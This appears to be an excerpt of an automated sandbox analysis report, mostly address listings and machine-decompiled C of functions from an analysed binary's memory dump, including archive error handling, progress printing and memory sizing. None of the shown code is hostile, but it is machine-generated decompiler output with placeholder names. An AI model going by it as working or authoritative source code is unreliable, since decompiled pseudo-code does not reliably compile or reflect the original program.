                                                                                                    0x003d164d
                                                                                                    0x003d1656
                                                                                                    0x003d165f
                                                                                                    0x003d1668
                                                                                                    0x003d1671
                                                                                                    0x003d167a
                                                                                                    0x003d1683
                                                                                                    0x003d168c
                                                                                                    0x003d1695
                                                                                                    0x003d169e
                                                                                                    0x003d16a4
                                                                                                    0x003d16a9
                                                                                                    0x003d16ab
                                                                                                    0x003d16ae
                                                                                                    0x003d16b7
                                                                                                    0x003d16ba
                                                                                                    0x003d16bd
                                                                                                    0x003d16c0
                                                                                                    0x003d16c0
                                                                                                    0x003d16c5
                                                                                                    0x003d16c5
                                                                                                    0x00000000
                                                                                                    0x003d16c0
                                                                                                    0x003d162d
                                                                                                    0x003d162f
                                                                                                    0x003d1633
                                                                                                    0x003d1638
                                                                                                    0x003d1638
                                                                                                    0x003d163b
                                                                                                    0x00000000
                                                                                                    0x003d163b
                                                                                                    0x003d149b
                                                                                                    0x003d149d
                                                                                                    0x003d14a1
                                                                                                    0x003d14a6
                                                                                                    0x003d14a6
                                                                                                    0x003d14a9
                                                                                                    0x00000000
                                                                                                    0x003d14a9
                                                                                                    0x003d1477
                                                                                                    0x003d147b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d0fee
                                                                                                    0x003d0fee
                                                                                                    0x003d0fee
                                                                                                    0x003d0ff1
                                                                                                    0x003d0ff4
                                                                                                    0x003d0ff8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1000
                                                                                                    0x003d100d
                                                                                                    0x003d1016
                                                                                                    0x003d101e
                                                                                                    0x003d1023
                                                                                                    0x003d1026
                                                                                                    0x003d102a
                                                                                                    0x003d102e
                                                                                                    0x003d1059
                                                                                                    0x003d105e
                                                                                                    0x003d1060
                                                                                                    0x003d15e4
                                                                                                    0x003d15e9
                                                                                                    0x003d15ed
                                                                                                    0x003d15f5
                                                                                                    0x003d15fe
                                                                                                    0x003d1603
                                                                                                    0x003d1606
                                                                                                    0x003d160a
                                                                                                    0x003d160f
                                                                                                    0x003d160f
                                                                                                    0x003d1612
                                                                                                    0x00000000
                                                                                                    0x003d1612
                                                                                                    0x003d1069
                                                                                                    0x003d106c
                                                                                                    0x003d106e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1074
                                                                                                    0x003d1086
                                                                                                    0x003d1088
                                                                                                    0x003d108a
                                                                                                    0x003d108d
                                                                                                    0x003d14b4
                                                                                                    0x003d14b9
                                                                                                    0x003d14bc
                                                                                                    0x003d14c0
                                                                                                    0x003d14c5
                                                                                                    0x003d14c5
                                                                                                    0x003d14c8
                                                                                                    0x00000000
                                                                                                    0x003d14c8
                                                                                                    0x003d1099
                                                                                                    0x003d109e
                                                                                                    0x003d10a7
                                                                                                    0x003d10ab
                                                                                                    0x003d10b6
                                                                                                    0x003d10ba
                                                                                                    0x003d10bf
                                                                                                    0x003d10c2
                                                                                                    0x003d10ca
                                                                                                    0x003d10d4
                                                                                                    0x003d10dd
                                                                                                    0x003d10e6
                                                                                                    0x003d10ef
                                                                                                    0x003d10fb
                                                                                                    0x003d1101
                                                                                                    0x003d1116
                                                                                                    0x003d111b
                                                                                                    0x003d111d
                                                                                                    0x003d1120
                                                                                                    0x003d1131
                                                                                                    0x003d1131
                                                                                                    0x003d1138
                                                                                                    0x003d14d6
                                                                                                    0x003d14dc
                                                                                                    0x003d14e3
                                                                                                    0x003d14ee
                                                                                                    0x003d14fa
                                                                                                    0x003d14ff
                                                                                                    0x003d1502
                                                                                                    0x003d1506
                                                                                                    0x003d150b
                                                                                                    0x003d150b
                                                                                                    0x003d150e
                                                                                                    0x00000000
                                                                                                    0x003d150e
                                                                                                    0x003d113e
                                                                                                    0x003d1153
                                                                                                    0x003d1156
                                                                                                    0x003d1158
                                                                                                    0x003d115e
                                                                                                    0x003d151e
                                                                                                    0x003d1524
                                                                                                    0x003d152b
                                                                                                    0x003d1536
                                                                                                    0x003d1542
                                                                                                    0x003d1547
                                                                                                    0x003d154a
                                                                                                    0x003d154e
                                                                                                    0x003d1553
                                                                                                    0x003d1553
                                                                                                    0x003d1556
                                                                                                    0x00000000
                                                                                                    0x003d1556
                                                                                                    0x003d1164
                                                                                                    0x003d1167
                                                                                                    0x003d1191
                                                                                                    0x003d1194
                                                                                                    0x003d1198
                                                                                                    0x003d119a
                                                                                                    0x003d119e
                                                                                                    0x003d11a2
                                                                                                    0x003d11a8
                                                                                                    0x003d11ad
                                                                                                    0x003d11ad
                                                                                                    0x003d119e
                                                                                                    0x003d11b0
                                                                                                    0x003d11b6
                                                                                                    0x003d11b8
                                                                                                    0x003d126a
                                                                                                    0x003d126a
                                                                                                    0x003d126e
                                                                                                    0x003d131f
                                                                                                    0x003d131f
                                                                                                    0x003d132e
                                                                                                    0x003d1332
                                                                                                    0x003d1336
                                                                                                    0x003d1343
                                                                                                    0x003d1343
                                                                                                    0x003d1345
                                                                                                    0x003d1345
                                                                                                    0x003d1347
                                                                                                    0x003d134a
                                                                                                    0x003d134f
                                                                                                    0x003d1355
                                                                                                    0x003d1355
                                                                                                    0x003d1355
                                                                                                    0x003d1359
                                                                                                    0x003d135c
                                                                                                    0x003d135c
                                                                                                    0x003d1362
                                                                                                    0x003d136f
                                                                                                    0x003d137b
                                                                                                    0x003d1382
                                                                                                    0x003d138b
                                                                                                    0x003d138c
                                                                                                    0x003d138f
                                                                                                    0x003d1395
                                                                                                    0x003d1398
                                                                                                    0x003d139e
                                                                                                    0x003d13a5
                                                                                                    0x003d13a8
                                                                                                    0x003d13ac
                                                                                                    0x003d13ad
                                                                                                    0x003d13b2
                                                                                                    0x003d13b4
                                                                                                    0x003d13b6
                                                                                                    0x00000000
                                                                                                    0x003d13bc
                                                                                                    0x003d13bc
                                                                                                    0x003d13bf
                                                                                                    0x003d13c3
                                                                                                    0x003d13f1
                                                                                                    0x003d13c5
                                                                                                    0x003d13d1
                                                                                                    0x003d13d7
                                                                                                    0x003d13dd
                                                                                                    0x003d13e3
                                                                                                    0x003d13e3
                                                                                                    0x003d13f7
                                                                                                    0x003d13fa
                                                                                                    0x003d13fa
                                                                                                    0x003d1400
                                                                                                    0x003d1405
                                                                                                    0x003d1408
                                                                                                    0x003d140b
                                                                                                    0x003d1413
                                                                                                    0x003d141c
                                                                                                    0x003d141f
                                                                                                    0x003d1422
                                                                                                    0x003d1426
                                                                                                    0x003d15a2
                                                                                                    0x003d15a8
                                                                                                    0x003d15af
                                                                                                    0x003d15ba
                                                                                                    0x003d15c6
                                                                                                    0x003d15cb
                                                                                                    0x003d15ce
                                                                                                    0x003d15d2
                                                                                                    0x003d15d7
                                                                                                    0x003d15d7
                                                                                                    0x003d15da
                                                                                                    0x00000000
                                                                                                    0x003d142c
                                                                                                    0x003d142c
                                                                                                    0x003d1432
                                                                                                    0x003d1438
                                                                                                    0x003d143f
                                                                                                    0x003d144a
                                                                                                    0x003d144e
                                                                                                    0x003d1453
                                                                                                    0x003d145a
                                                                                                    0x00000000
                                                                                                    0x003d145f
                                                                                                    0x003d1426
                                                                                                    0x003d13b6
                                                                                                    0x003d1338
                                                                                                    0x003d133c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d133e
                                                                                                    0x003d1340
                                                                                                    0x00000000
                                                                                                    0x003d1340
                                                                                                    0x003d1274
                                                                                                    0x003d127b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1281
                                                                                                    0x003d1287
                                                                                                    0x003d128b
                                                                                                    0x003d1292
                                                                                                    0x003d1298
                                                                                                    0x003d129e
                                                                                                    0x003d12ea
                                                                                                    0x003d12ec
                                                                                                    0x003d12ee
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d12f0
                                                                                                    0x003d12f3
                                                                                                    0x003d12f6
                                                                                                    0x003d12f8
                                                                                                    0x003d1304
                                                                                                    0x003d1304
                                                                                                    0x003d130c
                                                                                                    0x003d130f
                                                                                                    0x003d1315
                                                                                                    0x003d1317
                                                                                                    0x003d1319
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1319
                                                                                                    0x003d12fa
                                                                                                    0x003d1300
                                                                                                    0x003d1300
                                                                                                    0x003d1302
                                                                                                    0x003d1302
                                                                                                    0x00000000
                                                                                                    0x003d1302
                                                                                                    0x003d12fc
                                                                                                    0x003d12fe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d12a0
                                                                                                    0x003d12a0
                                                                                                    0x003d12af
                                                                                                    0x003d12b4
                                                                                                    0x003d12b6
                                                                                                    0x003d12b8
                                                                                                    0x003d12bb
                                                                                                    0x003d12c0
                                                                                                    0x003d12ce
                                                                                                    0x003d12d0
                                                                                                    0x003d12d0
                                                                                                    0x003d12bb
                                                                                                    0x003d12d6
                                                                                                    0x003d12dc
                                                                                                    0x003d12dc
                                                                                                    0x003d12e4
                                                                                                    0x00000000
                                                                                                    0x003d11be
                                                                                                    0x003d11c8
                                                                                                    0x003d11cb
                                                                                                    0x003d11cd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d11e4
                                                                                                    0x003d11e4
                                                                                                    0x003d11e6
                                                                                                    0x003d11e9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d11eb
                                                                                                    0x003d11ef
                                                                                                    0x003d1224
                                                                                                    0x003d1229
                                                                                                    0x003d122d
                                                                                                    0x003d1231
                                                                                                    0x003d1243
                                                                                                    0x003d1246
                                                                                                    0x003d124b
                                                                                                    0x003d124e
                                                                                                    0x003d1255
                                                                                                    0x003d125a
                                                                                                    0x003d1261
                                                                                                    0x003d1267
                                                                                                    0x00000000
                                                                                                    0x003d1267
                                                                                                    0x003d1238
                                                                                                    0x003d123d
                                                                                                    0x003d1241
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1241
                                                                                                    0x003d120b
                                                                                                    0x003d120d
                                                                                                    0x003d120f
                                                                                                    0x003d1561
                                                                                                    0x003d1567
                                                                                                    0x003d156d
                                                                                                    0x003d1574
                                                                                                    0x003d157f
                                                                                                    0x003d158b
                                                                                                    0x003d1591
                                                                                                    0x003d1595
                                                                                                    0x00000000
                                                                                                    0x003d1595
                                                                                                    0x00000000
                                                                                                    0x003d1215
                                                                                                    0x003d11b8
                                                                                                    0x003d1169
                                                                                                    0x003d1169
                                                                                                    0x003d116c
                                                                                                    0x003d1170
                                                                                                    0x003d1174
                                                                                                    0x003d117a
                                                                                                    0x003d1186
                                                                                                    0x003d1189
                                                                                                    0x003d1189
                                                                                                    0x00000000
                                                                                                    0x003d1174
                                                                                                    0x003d1122
                                                                                                    0x003d1128
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d112a
                                                                                                    0x00000000
                                                                                                    0x003d112a
                                                                                                    0x003d1036
                                                                                                    0x003d103d
                                                                                                    0x003d1043
                                                                                                    0x003d1049
                                                                                                    0x00000000
                                                                                                    0x003d1460
                                                                                                    0x003d1460
                                                                                                    0x003d1466
                                                                                                    0x003d1466
                                                                                                    0x003d146f
                                                                                                    0x003d146f
                                                                                                    0x00000000
                                                                                                    0x003d0fac
                                                                                                    0x003d0faf
                                                                                                    0x003d0fb8
                                                                                                    0x003d0fbd
                                                                                                    0x003d0fc0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d0fc4
                                                                                                    0x003d0fc8
                                                                                                    0x003d0fcd
                                                                                                    0x003d0fcd
                                                                                                    0x003d0fd0
                                                                                                    0x003d16c8
                                                                                                    0x003d16d3
                                                                                                    0x003d16d9
                                                                                                    0x00000000
                                                                                                    0x003d16db
                                                                                                    0x003d0d94
                                                                                                    0x003d0d94
                                                                                                    0x003d0d9a
                                                                                                    0x003d0da2
                                                                                                    0x003d0da7
                                                                                                    0x003d0daa
                                                                                                    0x003d0dae
                                                                                                    0x003d0db4
                                                                                                    0x003d0dba
                                                                                                    0x003d0dbe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d0dce
                                                                                                    0x003d0dde
                                                                                                    0x003d0de2
                                                                                                    0x003d0de9
                                                                                                    0x003d0ecc
                                                                                                    0x003d0ece
                                                                                                    0x003d0ed1
                                                                                                    0x003d0ed4
                                                                                                    0x003d0ed9
                                                                                                    0x003d0eed
                                                                                                    0x003d0f05
                                                                                                    0x003d0f0d
                                                                                                    0x003d16dc
                                                                                                    0x003d16e2
                                                                                                    0x003d16ea
                                                                                                    0x003d16ea
                                                                                                    0x003d0df2
                                                                                                    0x003d0df7
                                                                                                    0x003d0edc
                                                                                                    0x003d0edf
                                                                                                    0x003d0ee4
                                                                                                    0x003d0ee7
                                                                                                    0x003d0eec
                                                                                                    0x00000000
                                                                                                    0x003d0dfd
                                                                                                    0x003d0e00
                                                                                                    0x003d0e04
                                                                                                    0x003d0e09
                                                                                                    0x003d0e0a
                                                                                                    0x003d0e19
                                                                                                    0x003d0e1f
                                                                                                    0x003d0e24
                                                                                                    0x003d0e2a
                                                                                                    0x003d0e33
                                                                                                    0x003d0e39
                                                                                                    0x003d0e43
                                                                                                    0x003d0e4f
                                                                                                    0x003d0e52
                                                                                                    0x003d0e56
                                                                                                    0x003d0e5b
                                                                                                    0x003d0e5f
                                                                                                    0x003d0e62
                                                                                                    0x00000000
                                                                                                    0x003d0d94

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D0D16
                                                                                                      • Part of subcall function 003B7253: GetLastError.KERNEL32(003BB86C), ref: 003B7253
                                                                                                      • Part of subcall function 003D18D0: __EH_prolog.LIBCMT ref: 003D18D5
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ErrorLastfree
                                                                                                    • String ID: Cannot find archive file$The item is a directory
                                                                                                    • API String ID: 683690243-1569138187
                                                                                                    • Opcode ID: beccab0daf2825b4a78dea295ee2a0e49c2dd98fd5dd3bb6efecd307a08674b8
                                                                                                    • Instruction ID: 2528ea33487a466f205afba20e5937a42999b8c8d2bc97de0410ca9ebe8562c7
                                                                                                    • Opcode Fuzzy Hash: beccab0daf2825b4a78dea295ee2a0e49c2dd98fd5dd3bb6efecd307a08674b8
                                                                                                    • Instruction Fuzzy Hash: C3724871D00258DFCB26DFA8D880BDEBBB5AF49304F15409AE959AB352C770AE81CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EB734 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003EB734(intOrPtr* __ecx) {
				signed int _v5;
				unsigned int _v12;
				long _v16;
				unsigned int _v20;
				char _v52;
				void* __edi;
				intOrPtr _t86;
				intOrPtr _t87;
				unsigned int _t104;
				signed char* _t105;
				unsigned int _t107;
				char** _t134;
				char* _t174;
				intOrPtr* _t175;
				intOrPtr* _t177;
				signed char _t202;

				_t177 = __ecx;
				_t174 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(__ecx + 0x30)) != 0) {
					_v16 = GetTickCount();
				}
				_v5 = _v5 & 0x00000000;
				if( *((intOrPtr*)(_t177 + 0x48)) == _t174) {
					L14:
					_t134 = _t177 + 0x38;
					_t134[1] = _t174;
					 *( *(_t177 + 0x38)) =  *( *(_t177 + 0x38)) & 0x00000000;
					E003EB68D(_t177);
					if(_v5 == 0) {
						L16:
						E003B276E(_t177 + 0x98, _t134);
						_t84 =  *(_t177 + 0x10);
						_t169 =  *(_t177 + 0x14);
						if(( *(_t177 + 0x10) |  *(_t177 + 0x14)) != 0) {
							L003B18FB( &_v52, _t84, _t169);
							E003B2820();
							E003B284C(_t134,  &_v52);
						}
						_t193 =  *((intOrPtr*)(_t177 + 0x1c)) - _t174;
						if( *((intOrPtr*)(_t177 + 0x1c)) != _t174) {
							E003B2820();
							E003B28A5(_t134, _t193, _t177 + 0x18);
						}
						if( *((intOrPtr*)(_t177 + 0x28)) != _t174 &&  *((intOrPtr*)(_t177 + 0x3c)) <  *((intOrPtr*)(_t177 + 0xac))) {
							E003B2820();
							_t176 = _t177 + 0x5c;
							E003B2F2F(_t177 + 0x5c, _t177 + 0x24);
							E003B209A( *(_t177 + 0xa4), _t177 + 0x5c);
							E003B2033( *(_t177 + 0xa4), _t177 + 0x5c, _t177 + 0x50);
							if( *(_t177 + 0x54) +  *((intOrPtr*)(_t177 + 0x3c)) >  *((intOrPtr*)(_t177 + 0xac))) {
								_t104 =  *((intOrPtr*)(_t177 + 0x28));
								_v12 = _t104;
								if(_t104 == 0) {
									L29:
									_t105 =  *(_t177 + 0x50);
									 *(_t177 + 0x54) =  *(_t177 + 0x54) & 0x00000000;
									 *_t105 =  *_t105 & 0x00000000;
									_t202 =  *_t105;
								} else {
									do {
										_t107 = _v12 >> 3;
										if(_t107 == 0) {
											_t107 = 1;
										}
										_v12 = _v12 - _t107;
										E003B2F2F(_t176, _t177 + 0x24);
										_v20 = _v12 >> 1;
										E003B34DC(_t176, _v12 >> 1,  *((intOrPtr*)(_t177 + 0x60)) - _v12);
										E003B3345(_t176, _v20, L" . ");
										E003B209A( *(_t177 + 0xa4), _t176);
										E003B2033( *(_t177 + 0xa4), _t176, _t177 + 0x50);
									} while ( *(_t177 + 0x54) +  *((intOrPtr*)(_t177 + 0x3c)) >  *((intOrPtr*)(_t177 + 0xac)) && _v12 != 0);
									if(_v12 == 0) {
										goto L29;
									}
								}
							}
							E003B28A5(_t134, _t202, _t177 + 0x50);
							_t174 = 0;
						}
						if(L003EB997(_t177 + 0x44, _t134) != 0) {
							E003EB5FA(_t177, _t174, _t174); // executed
							_t175 = _t177 + 0xa4;
							fputs( *_t134,  *( *(_t177 + 0xa4))); // executed
							if( *((char*)(_t177 + 0xa8)) != 0) {
								L003B1F91( *_t175);
							}
							E003B276E(_t177 + 0x44, _t134);
							_t174 = 0;
						}
						_t86 = L003EB9B5(_t177 + 0x68, _t177);
						if( *((intOrPtr*)(_t177 + 0x30)) != _t174) {
							_t87 = _v16;
							 *((intOrPtr*)(_t177 + 0x34)) = _t87;
							return _t87;
						}
					} else {
						_t86 = E003B29F4(_t134, _t177 + 0x98);
						if(_t86 == 0) {
							goto L16;
						}
					}
				} else {
					_t86 =  *((intOrPtr*)(_t177 + 0x30));
					if(_t86 == _t174 || _v16 -  *((intOrPtr*)(_t177 + 0x34)) >= _t86) {
						if(E003B29F4(_t177 + 0x80, _t177 + 0x18) == 0 || E003B3485(_t177 + 0x8c, _t177 + 0x24) == 0 ||  *((intOrPtr*)(_t177 + 0x78)) !=  *(_t177 + 0x10) ||  *((intOrPtr*)(_t177 + 0x7c)) !=  *(_t177 + 0x14)) {
							goto L14;
						} else {
							if( *((intOrPtr*)(_t177 + 0x70)) !=  *((intOrPtr*)(_t177 + 8)) ||  *((intOrPtr*)(_t177 + 0x74)) !=  *((intOrPtr*)(_t177 + 0xc)) ||  *((intOrPtr*)(_t177 + 0x68)) !=  *_t177) {
								L13:
								_v5 = 1;
								goto L14;
							} else {
								_t86 =  *((intOrPtr*)(_t177 + 0x6c));
								if(_t86 !=  *((intOrPtr*)(_t177 + 4))) {
									goto L13;
								}
							}
						}
					}
				}
				return _t86;
			}



















                                                                                                    0x003eb73d
                                                                                                    0x003eb73f
                                                                                                    0x003eb744
                                                                                                    0x003eb747
                                                                                                    0x003eb74f
                                                                                                    0x003eb74f
                                                                                                    0x003eb752
                                                                                                    0x003eb759
                                                                                                    0x003eb7cb
                                                                                                    0x003eb7ce
                                                                                                    0x003eb7d3
                                                                                                    0x003eb7d6
                                                                                                    0x003eb7d9
                                                                                                    0x003eb7e2
                                                                                                    0x003eb7f9
                                                                                                    0x003eb800
                                                                                                    0x003eb805
                                                                                                    0x003eb808
                                                                                                    0x003eb80f
                                                                                                    0x003eb816
                                                                                                    0x003eb81d
                                                                                                    0x003eb828
                                                                                                    0x003eb828
                                                                                                    0x003eb82d
                                                                                                    0x003eb830
                                                                                                    0x003eb834
                                                                                                    0x003eb83f
                                                                                                    0x003eb83f
                                                                                                    0x003eb847
                                                                                                    0x003eb85e
                                                                                                    0x003eb866
                                                                                                    0x003eb86c
                                                                                                    0x003eb878
                                                                                                    0x003eb888
                                                                                                    0x003eb899
                                                                                                    0x003eb89f
                                                                                                    0x003eb8a4
                                                                                                    0x003eb8a7
                                                                                                    0x003eb91e
                                                                                                    0x003eb91e
                                                                                                    0x003eb921
                                                                                                    0x003eb925
                                                                                                    0x003eb925
                                                                                                    0x003eb8a9
                                                                                                    0x003eb8a9
                                                                                                    0x003eb8ac
                                                                                                    0x003eb8af
                                                                                                    0x003eb8b3
                                                                                                    0x003eb8b3
                                                                                                    0x003eb8b4
                                                                                                    0x003eb8bd
                                                                                                    0x003eb8d1
                                                                                                    0x003eb8d4
                                                                                                    0x003eb8e3
                                                                                                    0x003eb8ef
                                                                                                    0x003eb8ff
                                                                                                    0x003eb90a
                                                                                                    0x003eb91c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003eb91c
                                                                                                    0x003eb8a7
                                                                                                    0x003eb92e
                                                                                                    0x003eb933
                                                                                                    0x003eb933
                                                                                                    0x003eb941
                                                                                                    0x003eb946
                                                                                                    0x003eb951
                                                                                                    0x003eb95b
                                                                                                    0x003eb96a
                                                                                                    0x003eb96e
                                                                                                    0x003eb96e
                                                                                                    0x003eb977
                                                                                                    0x003eb97c
                                                                                                    0x003eb97c
                                                                                                    0x003eb982
                                                                                                    0x003eb98a
                                                                                                    0x003eb98c
                                                                                                    0x003eb98f
                                                                                                    0x00000000
                                                                                                    0x003eb98f
                                                                                                    0x003eb7e4
                                                                                                    0x003eb7ec
                                                                                                    0x003eb7f3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003eb7f3
                                                                                                    0x003eb75b
                                                                                                    0x003eb75b
                                                                                                    0x003eb760
                                                                                                    0x003eb780
                                                                                                    0x00000000
                                                                                                    0x003eb7a4
                                                                                                    0x003eb7aa
                                                                                                    0x003eb7c7
                                                                                                    0x003eb7c7
                                                                                                    0x00000000
                                                                                                    0x003eb7bb
                                                                                                    0x003eb7bb
                                                                                                    0x003eb7c1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003eb7c1
                                                                                                    0x003eb7aa
                                                                                                    0x003eb780
                                                                                                    0x003eb760
                                                                                                    0x003eb996

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountTickfputs
                                                                                                    • String ID: .
                                                                                                    • API String ID: 290905099-4150638102
                                                                                                    • Opcode ID: a6a155dd47160e58252cfa2550c30f140f870d1b4e1ac36fddf59f95a2cfb085
                                                                                                    • Instruction ID: 49eae30ceb739dc344db0c48788ab2784be81498db59de6d3d8dd78f817292cc
                                                                                                    • Opcode Fuzzy Hash: a6a155dd47160e58252cfa2550c30f140f870d1b4e1ac36fddf59f95a2cfb085
                                                                                                    • Instruction Fuzzy Hash: F5715930600B549FCB23EF66C591AABF7F6AF85704F114A1DE1878BA82DB70B945CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EF5A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E003EF5A9(intOrPtr __edx, void* __eflags) {
				char _v8;
				char _v12;
				void* __ecx;
				intOrPtr _t23;
				char _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t35;
				void* _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr* _t45;
				void* _t52;

				_t39 = __edx;
				_push(_t35);
				_push(_t35);
				_t45 = _t35; // executed
				_t23 = L003B97DA(); // executed
				 *_t45 = _t23;
				 *((intOrPtr*)(_t45 + 4)) = _t23;
				 *((intOrPtr*)(_t45 + 0x20)) = 0x40000000;
				 *((intOrPtr*)(_t45 + 0x10)) = 0x40000000;
				 *((intOrPtr*)(_t45 + 0x18)) = 0x40000000;
				 *((char*)(_t45 + 8)) = 0;
				_v12 = 0x40000000;
				_v8 = 0;
				 *((intOrPtr*)(_t45 + 0x24)) = 0;
				 *((intOrPtr*)(_t45 + 0x14)) = 0;
				 *((intOrPtr*)(_t45 + 0x1c)) = 0;
				_t25 = E003B9809( &_v12); // executed
				 *((char*)(_t45 + 9)) = _t25;
				if(_t25 != 0) {
					_t26 = _v12;
					_t42 = _v8;
					 *((intOrPtr*)(_t45 + 0x20)) = _t26;
					 *((intOrPtr*)(_t45 + 0x24)) = _t42;
					if(_t42 > 0 || _t26 > 0x70000000) {
						_v12 = 0x70000000;
						_t42 = 0;
						_t26 = 0x70000000;
					}
					_t52 = _t42 - 0x3333333;
					if(_t52 > 0 || _t52 >= 0 && _t26 > 0x33333333) {
						_t28 = E0041F4B0(E0041F380(_t26, _t42, 0x64, 0), _t39, 0x50, 0);
					} else {
						_t28 = E0041F380(E0041F4B0(_t26, _t42, 0x50, 0), _t39, 0x64, 0);
					}
					 *((intOrPtr*)(_t45 + 0x10)) = _t28;
					 *((intOrPtr*)(_t45 + 0x14)) = _t39;
					_t38 = 5;
					_t40 = _t42;
					_t25 = E0041F4B0(E0041F470(_v12, _t38, _t40), _t40, 0x11, 0);
					 *((intOrPtr*)(_t45 + 0x18)) = _t25;
					 *((intOrPtr*)(_t45 + 0x1c)) = _t40;
				}
				return _t25;
			}

















                                                                                                    0x003ef5a9
                                                                                                    0x003ef5ac
                                                                                                    0x003ef5ad
                                                                                                    0x003ef5b0
                                                                                                    0x003ef5b2
                                                                                                    0x003ef5b7
                                                                                                    0x003ef5b9
                                                                                                    0x003ef5c3
                                                                                                    0x003ef5c6
                                                                                                    0x003ef5c9
                                                                                                    0x003ef5cf
                                                                                                    0x003ef5d2
                                                                                                    0x003ef5d5
                                                                                                    0x003ef5d8
                                                                                                    0x003ef5db
                                                                                                    0x003ef5de
                                                                                                    0x003ef5e1
                                                                                                    0x003ef5e8
                                                                                                    0x003ef5eb
                                                                                                    0x003ef5f1
                                                                                                    0x003ef5f5
                                                                                                    0x003ef5f8
                                                                                                    0x003ef5fd
                                                                                                    0x003ef605
                                                                                                    0x003ef60b
                                                                                                    0x003ef60e
                                                                                                    0x003ef610
                                                                                                    0x003ef610
                                                                                                    0x003ef612
                                                                                                    0x003ef618
                                                                                                    0x003ef648
                                                                                                    0x003ef623
                                                                                                    0x003ef632
                                                                                                    0x003ef632
                                                                                                    0x003ef64d
                                                                                                    0x003ef655
                                                                                                    0x003ef658
                                                                                                    0x003ef659
                                                                                                    0x003ef665
                                                                                                    0x003ef66a
                                                                                                    0x003ef66d
                                                                                                    0x003ef670
                                                                                                    0x003ef674

                                                                                                    APIs
                                                                                                      • Part of subcall function 003B9809: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 003B982D
                                                                                                      • Part of subcall function 003B9809: GetProcAddress.KERNEL32(00000000), ref: 003B9834
                                                                                                      • Part of subcall function 003B9809: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 003B9842
                                                                                                    • __aulldiv.LIBCMT ref: 003EF632
                                                                                                    • __aulldiv.LIBCMT ref: 003EF63E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
